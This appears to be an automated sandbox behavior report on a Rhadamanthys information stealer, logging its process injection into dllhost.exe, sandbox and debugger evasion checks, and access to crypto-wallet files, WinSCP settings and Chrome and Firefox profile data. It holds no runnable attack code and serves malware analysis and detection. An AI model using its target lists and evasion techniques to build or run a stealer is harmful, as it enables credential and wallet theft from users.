Source: C:\Windows\SysWOW64\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\Public\Documents\nUCp.exe	API/Special instruction interceptor: Address: 7FF8418CD044
Source: C:\Windows\SysWOW64\OpenWith.exe	API/Special instruction interceptor: Address: 7FF8418CD044
Source: C:\Windows\SysWOW64\OpenWith.exe	API/Special instruction interceptor: Address: 511A83A

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: OpenWith.exe, 00000005.00000002.1463804330.0000000004540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCMON.EXE
Source: OpenWith.exe, 00000005.00000002.1463804330.0000000004540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OCEXP64.EXETCPVIEW.EXETCPVIEW64.EXEPROCMON.EXE33

Source: C:\Windows\System32\dllhost.exe

Code function: GetAdaptersInfo,

9_2_0000022FAA4B2AC4

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6166			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3683			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644	Thread sleep time: -6456360425798339s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 892	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FFA165 FindFirstFileExW,

4_2_00FFA165

Source: C:\Windows\System32\OpenWith.exe

Code function: 6_3_00007DF46E539F04 GetSystemInfo,

6_3_00007DF46E539F04

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: OpenWith.exe, 00000006.00000003.1514008533.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1514008533.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMCIDevSymbol
Source: OpenWith.exe, 00000005.00000002.1463429475.0000000002BC8000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: OpenWith.exe, 00000006.00000003.1541323666.0000011F7ADA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkmc
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: powershell.exe, 00000000.00000002.1402300584.00000177EEB5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000006.00000003.1514008533.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink+QO
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: OpenWith.exe, 00000006.00000003.1543394834.0000011F7B502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FF9AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_00FF9AB4

Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_3_01002277 mov eax, dword ptr fs:[00000030h]	4_3_01002277
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_01002277 mov eax, dword ptr fs:[00000030h]	4_2_01002277
Source: C:\Windows\SysWOW64\OpenWith.exe	Code function: 5_3_027F0283 mov eax, dword ptr fs:[00000030h]	5_3_027F0283

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FF4E5A GetProcessHeap,RtlAllocateHeap,GetModuleFileNameW,_wcsrchr,lstrlenW,GetProcessHeap,RtlFreeHeap,MulDiv,

4_2_00FF4E5A

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FF9AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00FF9AB4
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FF5A33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_00FF5A33
Source: C:\Users\Public\Documents\nUCp.exe	Code function: 4_2_00FF55A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_00FF55A9

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Program Files\Windows Media Player\setup_wm.exe

Memory allocated: C:\Windows\System32\dllhost.exe base: 22FAA4B0000 protect: page read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Program Files\Windows Media Player\setup_wm.exe	Memory written: C:\Windows\System32\dllhost.exe base: 22FAA4B0000			Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF6F7FC14E0			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe "C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process created: C:\Users\Public\Documents\nUCp.exe C:\Users\Public\Documents\nUCp.exe	Jump to behavior
Source: C:\Users\Public\Documents\nUCp.exe	Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\setup_wm.exe "C:\Program Files\Windows Media Player\setup_wm.exe"	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"	Jump to behavior

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FF5845 cpuid

4_2_00FF5845

Source: C:\Windows\System32\OpenWith.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe

Code function: 6_3_00007DF46E4D1B18 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,

6_3_00007DF46E4D1B18

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FF5490 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

4_2_00FF5490

Source: C:\Windows\SysWOW64\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: OpenWith.exe, 00000005.00000002.1463804330.0000000004540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: OpenWith.exe, 00000005.00000002.1463804330.0000000004540000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Procmon.exe

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 4.2.nUCp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000003.1419467605.0000000004D19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1463969465.0000000004550000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1511743151.0000011F7B4C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1389217701.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.1393293145.00000000044F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1393080101.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Found many strings related to Crypto-Wallets (likely being stolen)

Source: OpenWith.exe, 00000006.00000003.1540218988.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: um-Electrum\conf
Source: OpenWith.exe, 00000006.00000003.1606135234.0000011F7AE10000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 00000006.00000003.1540218988.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 00000006.00000003.1540218988.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: passphrase.json
Source: OpenWith.exe, 00000006.00000003.1540218988.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Exodus
Source: OpenWith.exe, 00000006.00000003.1540218988.0000011F7AE19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: powershell.exe, 00000000.00000002.1406806497.00007FF7C0E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fhihpiojkbmbpdjeoajapmgkhlnakfjf\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\safebrowsing\google4	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\cache2	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\aghbiahbpaijignceidepookljebhfak\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\settings\main\ms-language-packs\browser\newtab	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\kefjledonklijopmnomlcbpllchaibag\Icons Monochrome	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\091tobv5.default-release\settings	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
